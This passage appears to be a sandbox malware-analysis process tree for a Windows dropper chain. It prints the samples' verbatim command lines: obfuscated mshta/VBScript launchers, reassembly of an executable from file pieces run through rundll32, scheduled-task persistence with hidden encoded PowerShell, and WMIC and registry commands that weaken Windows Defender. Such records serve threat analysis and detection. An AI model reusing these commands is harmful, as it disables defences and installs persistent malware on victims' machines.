            command line: "C:\Users\Admin\Documents\0l0xrtpnHHTLm65menBbcuXf.exe"
            C:\Program Files (x86)\Company\NewProduct\cm3.exe  (depth 7)
              command line: "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
              - Executes dropped EXE
            C:\Program Files (x86)\Company\NewProduct\inst002.exe  (depth 7)
              command line: "C:\Program Files (x86)\Company\NewProduct\inst002.exe"
              - Executes dropped EXE
            C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe  (depth 7)
              command line: "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
              C:\Users\Admin\AppData\Roaming\2285034.scr  (depth 8)
                command line: "C:\Users\Admin\AppData\Roaming\2285034.scr" /S
                - Checks processor information in registry
                - Enumerates system info in registry
              C:\Users\Admin\AppData\Roaming\3436754.scr  (depth 8)
                command line: "C:\Users\Admin\AppData\Roaming\3436754.scr" /S
                - Suspicious behavior: SetClipboardViewer
              C:\Users\Admin\AppData\Roaming\8280124.scr  (depth 8)
                command line: "C:\Users\Admin\AppData\Roaming\8280124.scr" /S
                - Checks BIOS information in registry
                - Checks whether UAC is enabled
                - Suspicious use of NtSetInformationThreadHideFromDebugger
              C:\Users\Admin\AppData\Roaming\8926187.scr  (depth 8)
                command line: "C:\Users\Admin\AppData\Roaming\8926187.scr" /S
                - Checks BIOS information in registry
                - Checks whether UAC is enabled
                - Suspicious use of NtSetInformationThreadHideFromDebugger
              C:\Users\Admin\AppData\Roaming\5724610.scr  (depth 8)
                command line: "C:\Users\Admin\AppData\Roaming\5724610.scr" /S
          C:\Users\Admin\Documents\CYhWK6wGUBr_0KUI2pFoRj1Q.exe  (depth 6)
            command line: "C:\Users\Admin\Documents\CYhWK6wGUBr_0KUI2pFoRj1Q.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            - Checks processor information in registry
            C:\Windows\SysWOW64\cmd.exe  (depth 7)
              command line: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Documents\CYhWK6wGUBr_0KUI2pFoRj1Q.exe" & exit
              - Checks processor information in registry
              - Enumerates system info in registry
              C:\Windows\SysWOW64\timeout.exe  (depth 8)
                command line: timeout /t 5
                - Delays execution with timeout.exe
          C:\Users\Admin\Documents\uqqAcKDbb5l4Gg0p81LTojnE.exe  (depth 6)
            command line: "C:\Users\Admin\Documents\uqqAcKDbb5l4Gg0p81LTojnE.exe"
            - Executes dropped EXE
            C:\Windows\SysWOW64\WerFault.exe  (depth 7)
              command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6380 -s 296
              - Program crash
              - Checks processor information in registry
              - Enumerates system info in registry
          C:\Users\Admin\Documents\vOsoiDDO3Q_G73JC3fZnrc96.exe  (depth 6)
            command line: "C:\Users\Admin\Documents\vOsoiDDO3Q_G73JC3fZnrc96.exe"
            C:\Windows\SysWOW64\WerFault.exe  (depth 7)
              command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 280
              - Program crash
          C:\Users\Admin\Documents\QKmrSnwh4KXiHnMhxSZE9bqV.exe  (depth 6)
            command line: "C:\Users\Admin\Documents\QKmrSnwh4KXiHnMhxSZE9bqV.exe"
            C:\Windows\SysWOW64\schtasks.exe  (depth 7)
              command line: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
              - Creates scheduled task(s)
            C:\Windows\SysWOW64\schtasks.exe  (depth 7)
              command line: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
              - Creates scheduled task(s)
            C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe  (depth 7)
              command line: "C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"
              C:\Users\Admin\Documents\ptMWvC5dONO_GiXZIiDN46y3.exe  (depth 8)
                command line: "C:\Users\Admin\Documents\ptMWvC5dONO_GiXZIiDN46y3.exe"
              C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe  (depth 8)
                command line: "C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe"
                C:\Windows\SysWOW64\mshta.exe  (depth 9)
                  command line: "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"=="""" for %w iN ( ""C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))
                  C:\Windows\SysWOW64\cmd.exe  (depth 10)
                    command line: "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""=="" for %w iN ( "C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe" ) do taskkill /f -Im "%~nXw"
                    C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE  (depth 11)
                      command line: ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd
                      C:\Windows\SysWOW64\mshta.exe  (depth 12)
                        command line: "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""=="""" for %w iN ( ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))
                        C:\Windows\SysWOW64\cmd.exe  (depth 13)
                          command line: "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "=="" for %w iN ( "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
                      C:\Windows\SysWOW64\mshta.exe  (depth 12)
                        command line: "C:\Windows\System32\mshta.exe" vbsCRipT:cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ).RuN("Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN &copy /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I& StArT control.exe ..\QVNGP.I & del /Q * " , 0, true ) )
                        - Executes dropped EXE
                        - Suspicious use of AdjustPrivilegeToken
                        C:\Windows\SysWOW64\cmd.exe  (depth 13)
                          command line: "C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN &copy /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX+ KPeo.Pvp + _OTV19C.~ +EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I&StArT control.exe ..\QVNGP.I &del /Q *
                          C:\Windows\SysWOW64\cmd.exe  (depth 14)
                            command line: C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"
                          C:\Windows\SysWOW64\cmd.exe  (depth 14)
                            command line: C:\Windows\system32\cmd.exe /S /D /c" EChO "
                          C:\Windows\SysWOW64\control.exe  (depth 14)
                            command line: control.exe ..\QVNGP.I
                            C:\Windows\SysWOW64\rundll32.exe  (depth 15)
                              command line: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\QVNGP.I
                              - Loads dropped DLL
                              C:\Windows\system32\RunDll32.exe  (depth 16)
                                command line: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\QVNGP.I
                                C:\Windows\SysWOW64\rundll32.exe  (depth 17)
                                  command line: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\QVNGP.I
                                  - Loads dropped DLL
                    C:\Windows\SysWOW64\taskkill.exe  (depth 11)
                      command line: taskkill /f -Im "9FYCmSt6meOsFYLuTdqw1vJu.exe"
                      - Kills process with taskkill
              C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe  (depth 8)
                command line: "C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe"
                C:\Windows\SysWOW64\mshta.exe  (depth 9)
                  command line: "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
                  - Executes dropped EXE
                  C:\Windows\SysWOW64\cmd.exe  (depth 10)
                    command line: "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe" ) do taskkill -F -Im "%~nXU"
                    C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe  (depth 11)
                      command line: SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
                      C:\Windows\SysWOW64\mshta.exe  (depth 12)
                        command line: "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
                        C:\Windows\SysWOW64\cmd.exe  (depth 13)
                          command line: "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
                      C:\Windows\SysWOW64\mshta.exe  (depth 12)
                        command line: "C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
                        C:\Windows\SysWOW64\cmd.exe  (depth 13)
                          command line: "C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
                          C:\Windows\SysWOW64\cmd.exe  (depth 14)
                            command line: C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                          C:\Windows\SysWOW64\cmd.exe  (depth 14)
                            command line: C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
                          C:\Windows\SysWOW64\control.exe  (depth 14)
                            command line: control .\FUEj5.QM
                            C:\Windows\SysWOW64\rundll32.exe  (depth 15)
                              command line: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
                              - Loads dropped DLL
                              C:\Windows\system32\RunDll32.exe  (depth 16)
                                command line: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
                                C:\Windows\SysWOW64\rundll32.exe  (depth 17)
                                  command line: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
                                  - Loads dropped DLL
                    C:\Windows\SysWOW64\taskkill.exe  (depth 11)
                      command line: taskkill -F -Im "J5vQKsMt5d8SFwzWTO3Fxk8I.exe"
                      - Kills process with taskkill
              C:\Users\Admin\Documents\HkLf_4fWJBBP2aKw8B_EGPCJ.exe  (depth 8)
                command line: "C:\Users\Admin\Documents\HkLf_4fWJBBP2aKw8B_EGPCJ.exe"
                C:\Windows\SysWOW64\WerFault.exe  (depth 9)
                  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 1728
                  - Program crash
                  - Checks processor information in registry
                  - Enumerates system info in registry
              C:\Users\Admin\Documents\YmLtMJXE5kpG5PRH_W7AZRIX.exe  (depth 8)
                command line: "C:\Users\Admin\Documents\YmLtMJXE5kpG5PRH_W7AZRIX.exe" /mixtwo
                C:\Windows\SysWOW64\WerFault.exe  (depth 9)
                  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 236
                  - Program crash
                  - Checks processor information in registry
                  - Enumerates system info in registry
              C:\Users\Admin\Documents\PlREWOPKJ6dQLCAu2xyyr7tT.exe  (depth 8)
                command line: "C:\Users\Admin\Documents\PlREWOPKJ6dQLCAu2xyyr7tT.exe"
                - Checks processor information in registry
                - Enumerates system info in registry
                C:\Windows\SysWOW64\WerFault.exe  (depth 9)
                  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6340 -s 236
                  - Program crash
                  - Checks processor information in registry
                  - Enumerates system info in registry
              C:\Users\Admin\Documents\h1jIwRqS79rGCdmcelReC17s.exe  (depth 8)
                command line: "C:\Users\Admin\Documents\h1jIwRqS79rGCdmcelReC17s.exe"
                C:\Users\Admin\AppData\Roaming\2221701.scr  (depth 9)
                  command line: "C:\Users\Admin\AppData\Roaming\2221701.scr" /S
                C:\Users\Admin\AppData\Roaming\4873741.scr  (depth 9)
                  command line: "C:\Users\Admin\AppData\Roaming\4873741.scr" /S
                  - Suspicious behavior: SetClipboardViewer
                C:\Users\Admin\AppData\Roaming\6017135.scr  (depth 9)
                  command line: "C:\Users\Admin\AppData\Roaming\6017135.scr" /S
                  C:\Windows\System32\Conhost.exe  (depth 10)
                    command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    - Suspicious use of SetThreadContext
              C:\Users\Admin\Documents\yU0_O9fPOQ35Bic99nCSDCEy.exe  (depth 8)
                command line: "C:\Users\Admin\Documents\yU0_O9fPOQ35Bic99nCSDCEy.exe" silent
              C:\Users\Admin\Documents\qR8T1u8Mf6IgWhERs6c5wOkA.exe  (depth 8)
                command line: "C:\Users\Admin\Documents\qR8T1u8Mf6IgWhERs6c5wOkA.exe"
                C:\Users\Admin\AppData\Local\Temp\7zS5356.tmp\Install.exe  (depth 9)
                  command line: .\Install.exe
                  C:\Users\Admin\AppData\Local\Temp\7zS6901.tmp\Install.exe  (depth 10)
                    command line: .\Install.exe /S /site_id "668658"
                    - Checks BIOS information in registry
                    - Drops file in System32 directory
                    - Enumerates system info in registry
                    C:\Windows\SysWOW64\cmd.exe  (depth 11)
                      command line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                      - Executes dropped EXE
                      C:\Windows\SysWOW64\forfiles.exe  (depth 12)
                        command line: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                        C:\Windows\SysWOW64\cmd.exe  (depth 13)
                          command line: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                          - Blocklisted process makes network request
                          - Executes dropped EXE
                          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (depth 14)
                            command line: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                            C:\Windows\SysWOW64\Wbem\WMIC.exe  (depth 15)
                              command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                      C:\Windows\SysWOW64\forfiles.exe  (depth 12)
                        command line: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
                        C:\Windows\SysWOW64\cmd.exe  (depth 13)
                          command line: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (depth 14)
                            command line: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                            C:\Windows\SysWOW64\Wbem\WMIC.exe  (depth 15)
                              command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                      C:\Windows\SysWOW64\forfiles.exe  (depth 12)
                        command line: forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
                        C:\Windows\SysWOW64\cmd.exe  (depth 13)
                          command line: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (depth 14)
                            command line: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                            C:\Windows\SysWOW64\Wbem\WMIC.exe  (depth 15)
                              command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                      C:\Windows\SysWOW64\forfiles.exe  (depth 12)
                        command line: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
                        C:\Windows\SysWOW64\cmd.exe  (depth 13)
                          command line: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (depth 14)
                            command line: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                            C:\Windows\SysWOW64\Wbem\WMIC.exe  (depth 15)
                              command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                    C:\Windows\SysWOW64\forfiles.exe  (depth 11)
                      command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                      C:\Windows\SysWOW64\cmd.exe  (depth 12)
                        command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                        \??\c:\windows\SysWOW64\reg.exe  (depth 13)
                          command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                        \??\c:\windows\SysWOW64\reg.exe  (depth 13)
                          command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                    C:\Windows\SysWOW64\forfiles.exe  (depth 11)
                      command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                      C:\Windows\SysWOW64\cmd.exe  (depth 12)
                        command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                        \??\c:\windows\SysWOW64\reg.exe  (depth 13)
                          command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                        \??\c:\windows\SysWOW64\reg.exe  (depth 13)
                          command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    C:\Windows\SysWOW64\schtasks.exe  (depth 11)
                      command line: schtasks /CREATE /TN "gfoNxSwpt" /SC once /ST 00:14:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                      - Creates scheduled task(s)
                    C:\Windows\SysWOW64\schtasks.exe  (depth 11)
                      command line: schtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 09:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\CCwdtYy.exe\" uG /site_id 668658 /S" /V1 /F
                      - Creates scheduled task(s)
              C:\Users\Admin\Documents\oRwRi1GBtOt2bWpZEv9NvTbH.exe  (depth 8)
                command line: "C:\Users\Admin\Documents\oRwRi1GBtOt2bWpZEv9NvTbH.exe"
                - Executes dropped EXE
                C:\Users\Admin\AppData\Local\Temp\is-R7QC7.tmp\oRwRi1GBtOt2bWpZEv9NvTbH.tmp  (depth 9)
                  command line: "C:\Users\Admin\AppData\Local\Temp\is-R7QC7.tmp\oRwRi1GBtOt2bWpZEv9NvTbH.tmp" /SL5="$603CC,506127,422400,C:\Users\Admin\Documents\oRwRi1GBtOt2bWpZEv9NvTbH.exe"
                  - Loads dropped DLL
                  C:\Users\Admin\AppData\Local\Temp\is-R01CF.tmp\Adam.exe  (depth 10)
                    command line: "C:\Users\Admin\AppData\Local\Temp\is-R01CF.tmp\Adam.exe" /S /UID=2709
                    - Drops file in Drivers directory
                    - Adds Run key to start application
                    C:\Program Files\Uninstall Information\RGWLVXUEKL\foldershare.exe  (depth 11)
                      command line: "C:\Program Files\Uninstall Information\RGWLVXUEKL\foldershare.exe" /VERYSILENT
                      - Suspicious behavior: GetForegroundWindowSpam
                    C:\Users\Admin\AppData\Local\Temp\0e-c612f-503-506be-ccde8a0858706\Jixaetaekyzha.exe  (depth 11)
                      command line: "C:\Users\Admin\AppData\Local\Temp\0e-c612f-503-506be-ccde8a0858706\Jixaetaekyzha.exe"
                      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 12)
                        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 13)
                          command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e4854718
                      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 12)
                        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 13)
                          command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e4854718
                      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 12)
                        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
                        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 13)
